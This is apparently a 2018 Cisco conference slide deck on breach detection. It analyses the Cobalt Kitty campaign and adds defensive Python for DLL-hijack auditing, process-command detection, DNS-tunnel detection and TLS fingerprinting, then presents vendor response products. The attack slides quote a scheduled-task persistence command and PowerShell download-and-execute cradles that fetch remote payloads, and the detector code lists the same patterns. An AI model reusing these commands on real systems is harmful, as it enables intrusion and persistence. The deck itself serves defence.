Breach Detection and Mitigation: Practical Examples
Dragan Novakovic, Consulting Systems Engineer
Challenges Today
• Many discrete security products
• Information overload
• High cost of attacker attribution
• Inefficient breach mitigation process
19 - 21 March 2018 | Cisco Connect | Rovinj, Croatia

Advanced Adversary
• A step below government-sponsored attackers, but much more widespread
• Individuals or organized groups, not governments
• Going after a smaller number of targets, but steering infections individually
• Capable of higher profits per target
• Going after $$: intellectual property, access and user data
Advanced Attack Commonalities
• Sandboxing and analysis evasion
• Misuse of legitimate resources
• Low forensic footprint
• Layers of scripting
• Steganography
• Stable C&C
From The Trenches: Cobalt Kitty Campaign
§ Well documented campaign
§ Reveals the latest attack techniques and tactics
§ Resulted in the compromise of a domain admin account and a severe data breach
Attack lifecycle: Delivery → Exploitation → Installation → Persistence → Lateral Movement → Exfiltration
Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle
From The Trenches: Cobalt Kitty Campaign (Delivery)
Spear-phishing delivery
– Email containing links to a fake Flash update
– Users likely to grant admin rights
– Downloads and executes Cobalt Strike Beacon (post-exploitation tool)
Microsoft Office Word document with macros
– Macro creates simple scheduled tasks using cmd.exe
– Windows AppLocker script-blocking policy bypass using regsvr32.exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)
– Runs PowerShell through rundll32 to bypass software restrictions (https://github.com/p3nt4/PowerShdll)
From The Trenches: Cobalt Kitty Campaign (Exploitation)
Scheduled task creation (runs mshta.exe every 15 minutes under a benign-looking task name):

    schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:''" /mo 15 /F

Microsoft HTML Application (HTA) executing VBScript, which runs a command through Wscript.Shell:

    Set objShell = CreateObject("Wscript.Shell")
    intReturn = objShell.Run("powershell -exec bypass -com ""IEX ((new-object net.webclient).downloadstring('hxxp://xx/image.jpg'))""")

PowerShell fetches the script body from a URL that looks like an image and executes it in memory with Invoke-Expression (IEX), so no script file touches the disk.
The downloaded payload is a Cobalt Strike Beacon.

From The Trenches: Cobalt Kitty Campaign (Persistence)
Persistence mechanisms
– Windows Scheduled Tasks
– Windows Services
– Windows Registry autorun keys
DLL hijacking
– Using legitimate software to execute a trojanized DLL
– Abuses a DLL that is not there by default, OR the search order in which it is loaded
– Example: Google Update loading goopdate.dll
– Example: Windows Search loading msfte.dll
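The two DLL hijacking variants named above (a DLL that is absent by default, and a writable directory that precedes the legitimate location in the search order) can be reasoned about mechanically. The following is an added example, not code from the deck or from any Cisco product: it models the default Windows DLL search order over a constructed file-system snapshot, resolves where the loader would find a DLL, and lists the user-writable directories where a planted copy would be picked up first. The directory contents, writable set and the partial KnownDLLs list are assumptions made for the example.

```python
# Partial KnownDLLs list (assumption; the real list lives under
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs). KnownDLLs are
# mapped from the system section and never resolved via the search path.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "gdi32.dll",
              "advapi32.dll", "ole32.dll", "shell32.dll", "ws2_32.dll", "rpcrt4.dll"}


def _key(d: str) -> str:
    """Case-insensitive directory key without a trailing backslash."""
    return d.lower().rstrip("\\")


def search_order(app_dir, cwd, path_dirs, safe_mode=True, sysroot=r"C:\Windows"):
    """Default DLL search order for a desktop application.
    With SafeDllSearchMode (the default since XP SP2) the current directory is searched
    after the system directories; with it disabled, right after the application directory."""
    system_dirs = [sysroot + r"\System32", sysroot + r"\System", sysroot]
    order = [app_dir, *system_dirs, cwd, *path_dirs] if safe_mode else [app_dir, cwd, *system_dirs, *path_dirs]
    seen, out = set(), []
    for d in order:                      # de-duplicate, keeping the first occurrence
        if _key(d) not in seen:
            seen.add(_key(d))
            out.append(d)
    return out


def resolve(dll, order, fs):
    """First directory in `order` that holds `dll`, or None for a phantom DLL."""
    for d in order:
        if dll.lower() in fs.get(_key(d), set()):
            return d
    return None


def hijack_candidates(dll, order, fs, writable):
    """Writable directories where a planted `dll` would be loaded before (or instead of) the real one."""
    if dll.lower() in KNOWN_DLLS:
        return []
    legit = resolve(dll, order, fs)
    cands = []
    for d in order:
        if legit is not None and _key(d) == _key(legit):
            break                        # the legitimate copy wins from here on
        if _key(d) in writable:
            cands.append(d)
    return cands


# Constructed file-system snapshot and the directories a low-privileged user can write to.
FS = {
    r"c:\windows\system32": {"ntdll.dll", "kernel32.dll", "version.dll"},     # msfte.dll absent by default
    r"c:\program files (x86)\google\update": {"googleupdate.exe", "goopdate.dll"},
    r"c:\users\student1\appdata\local\temp": set(),
    r"c:\users\student1\tools": {"tool.exe"},
}
WRITABLE = {r"c:\users\student1\appdata\local\temp", r"c:\users\student1\tools"}
PATH_DIRS = [r"C:\Windows\System32", r"C:\Users\Student1\tools"]
TEMP = r"C:\Users\Student1\AppData\Local\Temp"


def demo():
    """The cases from the slide: phantom DLL, legitimate DLL already first in line,
    and a writable application directory shadowing a system DLL."""
    results = {}
    # 1. Windows Search binaries live in System32 and ask for msfte.dll, which exists nowhere:
    #    every writable directory on the search path is a valid planting spot.
    order = search_order(r"C:\Windows\System32", TEMP, PATH_DIRS)
    results["msfte.dll"] = hijack_candidates("msfte.dll", order, FS, WRITABLE)
    # 2. GoogleUpdate.exe loads goopdate.dll from its own directory, which is first in the order;
    #    replacing it needs write access to Program Files, i.e. admin rights.
    order = search_order(r"C:\Program Files (x86)\Google\Update", TEMP, PATH_DIRS)
    results["goopdate.dll"] = hijack_candidates("goopdate.dll", order, FS, WRITABLE)
    # 3. A tool run from a user-writable folder loads version.dll: the app dir beats System32.
    order = search_order(r"C:\Users\Student1\tools", r"C:\Users\Student1\tools", PATH_DIRS)
    results["version.dll"] = hijack_candidates("version.dll", order, FS, WRITABLE)
    results["kernel32.dll"] = hijack_candidates("kernel32.dll", order, FS, WRITABLE)  # KnownDLL: immune
    return results


if __name__ == "__main__":
    for dll, dirs in demo().items():
        print(f"{dll:14s} -> {dirs or 'not hijackable from user land'}")
```

The defensive reading of the same model: for each service binary, enumerate the DLLs it requests that resolve to None (phantoms) or that resolve behind a writable directory, and either fix the ACLs or ship the DLL so the search never reaches a writable location.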
From The Trenches: Cobalt Kitty Campaign (Lateral Movement)
File-less credential and hash stealing
– Modified version of Mimikatz (file-less)
– Modified version of a password file dumper
Lateral movement
– Pass-the-hash and pass-the-ticket attacks
– Use of Windows Management Instrumentation (WMI) for remote execution
From The Trenches: Cobalt Kitty Campaign (Lateral Movement, continued)
File-less scanning using PowerUp
– Scanning for open ports, vulnerable services and OS fingerprinting using an externally hosted PowerShell script loaded straight into memory (file-less download, then Invoke-Expression):

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mK64oH'); Invoke-AllChecks"

The URL shortener hides the real hosting location; Invoke-AllChecks is PowerUp's entry point and runs its privilege-escalation checks.
References:
https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
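The command lines on the exploitation slide (schtasks launching mshta, the HTA's PowerShell cradle) and the PowerUp cradle above share a small number of traits that endpoint telemetry exposes: a scheduled task whose action is a script host, mshta started with an inline about:/javascript: URL, PowerShell started with an execution-policy bypass plus an in-memory download-and-IEX pattern, and PowerShell spawned by a script host or Office process. The following is an added example, not code from the deck or from any Cisco product: it runs those rules over constructed Sysmon-style process-creation events (PIDs, paths and the benign control are made up) and returns which rule fired on which process. The LOLBin lists and regular expressions are assumptions tuned to the commands shown on the slides.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 / EDR telemetry style)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry modelled on the chain from the slides:
# Word macro -> cmd.exe -> schtasks -> mshta (inline about: URL, started by the task scheduler)
# -> PowerShell download cradle; plus the PowerUp cradle and one benign admin script as a control.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE", '"WINWORD.EXE" invoice.doc'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:\'\'" /mo 15 /F'),
    ProcEvent(310, 300, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr "mshta.exe about:\'\'" /mo 15 /F'),
    ProcEvent(400, 1,   r"C:\Windows\System32\mshta.exe", "mshta.exe about:''"),
    ProcEvent(500, 400, PS,
              'powershell -exec bypass -com "IEX ((new-object net.webclient).downloadstring(\'hxxp://xx/image.jpg\'))"'),
    ProcEvent(600, 100, PS,
              'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://bit.ly/1mK64oH\'); Invoke-AllChecks"'),
    ProcEvent(700, 100, PS, r"powershell -File C:\scripts\inventory.ps1"),        # benign control
]

# Binaries that should rarely be the action of a scheduled task created from user land (assumption).
LOLBIN_LAUNCHERS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "powershell.exe",
                    "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
# Parents that normally have no business spawning PowerShell (assumption).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe",
                "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

SCHTASKS_RE = re.compile(r'schtasks(?:\.exe)?\b.*?/create\b.*?/tr\s+"?([^\s"]+)', re.I)
MSHTA_INLINE_RE = re.compile(r'mshta(?:\.exe)?\s+(?:about:|javascript:|vbscript:|https?://)', re.I)
PS_BYPASS_RE = re.compile(r'-e[xp][a-z]*\s+bypass', re.I)           # -exec / -ExecutionPolicy / -ep
PS_IEX_RE = re.compile(r'\b(?:iex|invoke-expression)\b', re.I)
PS_DOWNLOAD_RE = re.compile(r'downloadstring|downloaddata|downloadfile|net\.webclient|'
                            r'invoke-webrequest|\biwr\b|invoke-restmethod|start-bitstransfer', re.I)


def detect(events):
    """Return (rule, pid) pairs for every rule that fires on an event."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        cmd, img = e.cmdline, basename(e.image)
        m = SCHTASKS_RE.search(cmd)
        if m and basename(m.group(1)) in LOLBIN_LAUNCHERS:
            findings.append(("schtasks_lolbin_task", e.pid))
        if MSHTA_INLINE_RE.search(cmd):
            findings.append(("mshta_inline_script", e.pid))
        if img == "powershell.exe":
            if PS_BYPASS_RE.search(cmd):
                findings.append(("powershell_exec_bypass", e.pid))
            if PS_IEX_RE.search(cmd) and PS_DOWNLOAD_RE.search(cmd):
                findings.append(("powershell_download_cradle", e.pid))
            parent = by_pid.get(e.ppid)
            if parent and basename(parent.image) in SCRIPT_HOSTS:
                findings.append(("powershell_from_script_host", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The rules match on command lines and on the parent/child relationship rather than on file hashes, which is the point when the payload never reaches disk: the only artefacts of this chain are the task registration and the process tree.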
From The Trenches: Cobalt Kitty Campaign (Exfiltration)
C&C and exfiltration using NetCat, DNS tunnelling and Cobalt Strike Malleable C2
Outlook scripts send the exfiltrated data by email to a Gmail address
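DNS tunnelling, one of the C&C and exfiltration channels listed above, leaves a statistical signature in plain query logs even when the payload is encrypted: long, high-entropy leftmost labels, a new subdomain on every query (nothing can be cached), and a preference for record types with room for downstream data. The following is an added example, not code from the deck or from any Cisco product: it aggregates a constructed query log per (client, domain), scores each aggregate against those indicators and flags pairs where at least two fire. The log lines, the thresholds and the two-label approximation of the registered domain are assumptions; production code would use the Public Suffix List.

```python
import hashlib
import math
from collections import defaultdict

# Constructed DNS query log: "<time> <client> <qname> <qtype>". The tunnel lines are generated
# with SHA-1 so the leftmost label looks like the opaque hex chunk a tunnelling tool emits.
BENIGN_LINES = [
    "10:00:01 10.1.1.20 www.example.com A",
    "10:00:02 10.1.1.20 mail.example.com A",
    "10:00:05 10.1.1.20 www.example.com A",
    "10:00:09 10.1.1.20 cdn.example.com A",
    "10:00:10 10.1.1.20 www.example.com AAAA",
] + ["10:01:%02d 10.1.1.37 e7c1f0b9a3d2.telemetry.vendor-example.net A" % i for i in range(6)]
TUNNEL_LINES = [
    "10:02:%02d 10.1.1.37 %s.tun-example.org TXT" % (i, hashlib.sha1(b"chunk%d" % i).hexdigest())
    for i in range(6)
]
SAMPLE_LOG = BENIGN_LINES + TUNNEL_LINES


def shannon_entropy(s: str) -> float:
    """Bits per character; ~0 for 'www', close to 4 for random hex, close to 5 for random base32."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registered domain (no Public Suffix List here).
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def profile(lines):
    """Aggregate per (client, registered domain) the features a tunnelling detector looks at."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "sub_len": 0,
                                 "entropy": 0.0, "txt_null": 0})
    for line in lines:
        _ts, client, qname, qtype = line.split()
        dom = registered_domain(qname)
        sub = qname.rstrip(".").lower()[: -len(dom)].rstrip(".")   # everything left of the domain
        s = stats[(client, dom)]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["sub_len"] += len(sub)
        s["entropy"] += shannon_entropy(sub.replace(".", ""))
        s["txt_null"] += int(qtype in ("TXT", "NULL"))
    return stats


def score(s):
    """Indicators that fire for one aggregate (thresholds are assumptions for the example)."""
    n = s["queries"]
    reasons = []
    if s["sub_len"] / n >= 30:
        reasons.append("long subdomains")          # data is carried in the query name
    if s["entropy"] / n >= 3.3:
        reasons.append("high-entropy labels")      # encoded payload, not words
    if n >= 5 and len(s["subdomains"]) / n >= 0.9:
        reasons.append("no subdomain reuse")       # every query is a new chunk
    if s["txt_null"] / n >= 0.5:
        reasons.append("TXT/NULL heavy")           # record types with room for downstream data
    return reasons


def flag_tunnels(stats, min_indicators=2):
    """(client, domain) pairs with at least `min_indicators`; a single one is common for CDNs and telemetry."""
    return sorted(k for k, s in stats.items() if len(score(s)) >= min_indicators)


if __name__ == "__main__":
    stats = profile(SAMPLE_LOG)
    for key, s in sorted(stats.items()):
        print(key, s["queries"], score(s))
    print("flagged:", flag_tunnels(stats))
```

The telemetry host in the sample shows why a single indicator is not enough: its hashed label is high-entropy but is reused on every query, while the tunnel trips all four. Low-and-slow tunnels spread the same features over hours, so the aggregation window matters as much as the thresholds.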
"The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him."
Sun Tzu, The Art of War
1. Hinder In-Advance Attack Preparation
✓ Cognitive Threat Analytics
– Internal state
– Passive
– No feeds
✓ StealthWatch
– Passive
– Lateral movement
– Baselining
2. Deploy Generic C&C Detectors
✓ Umbrella Investigate
– Predictive algorithms
– Automatic takedown
– Co-occurrences
✓ Cognitive Threat Analytics
– Uncovers the entire infrastructure
– Behavior and context
– Including low-and-slow and steganography-based channels
✓ Encrypted Traffic Analytics (StealthWatch)
Detects malicious traffic without decrypting it, by analyzing:
– the initial data packet: hostname (SNI), certificate information, supported cipher suites
– packet size and timing in TLS-based connections
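The "initial data packet" features above come from the TLS ClientHello, which is sent in the clear before any key exchange. The following is an added example, not code from the deck or from Cisco's Encrypted Traffic Analytics: it builds two constructed ClientHello records (a browser-like one and a bare-bones implant-like one), parses out the client version, SNI, cipher suites and extension types, derives a JA3-style fingerprint string and applies a few heuristics. The suite code points are from the IANA registry; the heuristics, the choice of suites and the zeroed client random are assumptions made for the example, and real JA3 also includes supported groups and point formats and MD5-hashes the string.

```python
import struct

# Cipher-suite code points (IANA TLS registry). Static-RSA suites give no forward secrecy;
# AEAD/ECDHE and TLS 1.3 suites are what current browsers lead with.
LEGACY_SUITES = {0x0004: "TLS_RSA_WITH_RC4_128_MD5", 0x0005: "TLS_RSA_WITH_RC4_128_SHA",
                 0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA", 0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
                 0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA"}
MODERN_SUITES = {0x1301: "TLS_AES_128_GCM_SHA256", 0x1302: "TLS_AES_256_GCM_SHA384",
                 0x1303: "TLS_CHACHA20_POLY1305_SHA256",
                 0xC02B: "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
                 0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
                 0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}
EXT_SERVER_NAME, EXT_SUPPORTED_GROUPS = 0x0000, 0x000A


def _ext(etype: int, body: bytes) -> bytes:
    return struct.pack("!HH", etype, len(body)) + body


def build_client_hello(sni, suites):
    """Minimal TLS 1.2 ClientHello record (constructed test input; client random is zeroed)."""
    body = struct.pack("!H", 0x0303) + bytes(32) + b"\x00"          # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                            # compression methods: null only
    exts = b""
    if sni:
        name = sni.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(name)) + name       # name_type 0 = host_name
        exts += _ext(EXT_SERVER_NAME, struct.pack("!H", len(entry)) + entry)
    exts += _ext(EXT_SUPPORTED_GROUPS, struct.pack("!HHH", 4, 0x001D, 0x0017))  # x25519, secp256r1
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body        # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(data: bytes) -> dict:
    """Fields visible in the first packet of a TLS session, extracted without decrypting anything."""
    if len(data) < 9 or data[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len, = struct.unpack("!H", data[3:5])
    hs = data[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version, = struct.unpack("!H", body[0:2])
    pos = 2 + 32                                                   # skip client random
    pos += 1 + body[pos]                                           # skip session id
    cs_len, = struct.unpack("!H", body[pos:pos + 2])
    pos += 2
    suites = [struct.unpack("!H", body[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                                           # skip compression methods
    info = {"version": version, "sni": None, "cipher_suites": suites, "extensions": []}
    if pos + 2 <= len(body):
        ext_len, = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            edata = body[pos:pos + elen]
            pos += elen
            info["extensions"].append(etype)
            if etype == EXT_SERVER_NAME and len(edata) >= 5 and edata[2] == 0:
                name_len, = struct.unpack("!H", edata[3:5])
                info["sni"] = edata[5:5 + name_len].decode("ascii", "replace")
    return info


def fingerprint(info: dict) -> str:
    """JA3-style string: version, cipher suites, extension types (reduced; see lead-in)."""
    return "%d,%s,%s" % (info["version"], "-".join(map(str, info["cipher_suites"])),
                         "-".join(map(str, info["extensions"])))


def assess(info: dict) -> list:
    """Heuristics over the parsed hello; a real system correlates with certificate data and flow timing."""
    reasons = []
    if not info["sni"]:
        reasons.append("no SNI")
    if info["version"] < 0x0303:
        reasons.append("pre-TLS1.2 client version")
    if info["cipher_suites"] and all(s in LEGACY_SUITES for s in info["cipher_suites"]):
        reasons.append("only legacy non-PFS suites offered")
    return reasons


# Constructed examples: a browser-like hello and a bare-bones implant-like hello.
BROWSER_HELLO = build_client_hello("www.example.com", [0x1301, 0x1302, 0x1303, 0xC02B, 0xC02F, 0xC030])
IMPLANT_HELLO = build_client_hello(None, [0x0004, 0x0005, 0x000A])

if __name__ == "__main__":
    for label, raw in (("browser", BROWSER_HELLO), ("implant", IMPLANT_HELLO)):
        info = parse_client_hello(raw)
        print(label, info["sni"], fingerprint(info), assess(info))
```

The fingerprint is the more durable signal: a hand-rolled or statically linked TLS stack in an implant produces the same string on every victim regardless of the destination, so it can be matched even when the SNI and certificate look clean. With TLS 1.3 and Encrypted Client Hello the SNI field itself becomes less reliable, which is why the slide pairs these features with packet size and timing.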
3. Stream Endpoint and Network Level Traces
Because:
– Coding errors happen
– Mistakes happen
– Detections that arrive only with a later definition update happen
Do:
§ Collect endpoint and network activity logs and have them at hand
✓ AMP for Endpoints
– Collects traces
– Retrospection
– Root cause analysis
– Exploit prevention
– Heuristic detection
✓ StealthWatch
– NetFlow for security
✓ Threat Grid
– Global database
– Indicators of compromise
– Pivoting and context
4. Use a Vendor with a Large Threat Research Team
✓ Talos
Telemetry: millions of telemetry agents; 1.5 million daily malware samples; 600 billion daily email messages; 16 billion daily web requests; 20 billion threats blocked daily; 1100+ threat traps; internet-wide scanning; honeypots; product telemetry
Threat intel: 250+ full-time threat intel researchers; vulnerability discovery (internal); 100+ threat intelligence partners
Intel sharing: service provider coordination program; customer data sharing programs; open source communities (500+ participants); industry sharing partnerships (ISACs); 3rd party programs (MAPP)
5. Deploy a Full Detector Stack
Detector layers: Policy/Patches, FW/NGFW, Reputation/Rules, Antivirus, Content Filtering, NGIPS, Sandboxing, Anomaly detection, Machine Learning
Trade-off: more detectors catch more complex malware, but bugs, cost and risk increase with every layer added.
Everything is Configured... Now What?

Breach Detection and Mitigation - Practically!
Breach Detection
– Detecting a breach
– Establishing a priority rating
– Reviewing related network activity
Immediate Reaction
– Following traces from C&C to a file
– Estimating spread on the endpoint and in the network
Final Reaction
– Finding additional malicious activity on the endpoint
– Analyzing the root cause
– Reimaging the affected endpoints
– Updating policies to prevent reinfection
Breach Detection and Mitigation Process
• CTA detects the C2 channel (alternatively Umbrella, Investigate, an IoC match or Talos intelligence)
• TG provides global and local file behavior context (endpoint level details)
• AMP identifies files responsible for C&C activity and provides endpoint visibility
• AMP quarantines malicious executables and blocks their further reintroduction
• ISE quarantines the endpoint
• AMP is used for root cause analysis before endpoint is re-imaged
All steps need to be done within hours to prevent data leaks!
Notification About a Breach
Daily reports in CTA and weekly reports in AMP: too slow!
Better:
§ Subscribe to email alerts
§ Use a SIEM for more granular control
Establishing Priority Rating
AMP and Threat Grid threat prioritization; CTA threat prioritization:

Risk          | Meaning         | Action
Critical Risk | Data damage     | Quarantine, then reimage
High Risk     | Bad infection   | Reimage
Medium Risk   | Light infection | Try to clean; if that fails, reimage
Low Risk      | Network only    | Try to clean; if that fails, monitor
Establishing Priority Rating: Demo: AMP Event Correlation

Step 1: Breach Detection (demo)

Step 2: Immediate Reaction (demo)

Automatic response with ISE
(Diagram: the device's HTTP(S) traffic logs feed CTA; CTA reports the incident to ISE over STIX/TAXII; ISE quarantines the device.)
Block Everywhere - AMP Unity
(Diagram: device trajectory and customer-specific whitelists and blacklists are held in the AMP Cloud and enforced on endpoints, network appliances (NGIPS, NGFW) and content appliances (WSA, ESA) between the endpoints and the WWW.)
Step 3: Final Reaction

Demo: Final Reaction
Complex malware revealed. Chain: malware path → PowerShell injection → privilege escalation → browser extension installation → stealing browser credentials
Would be prevented by ISE quarantine.
Browser Exfiltration Module Revealed
C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js
Technologies Used
• AMP for Endpoints
• Cognitive Threat Analytics
• Threat Grid
• StealthWatch
• AMP Visibility
• ISE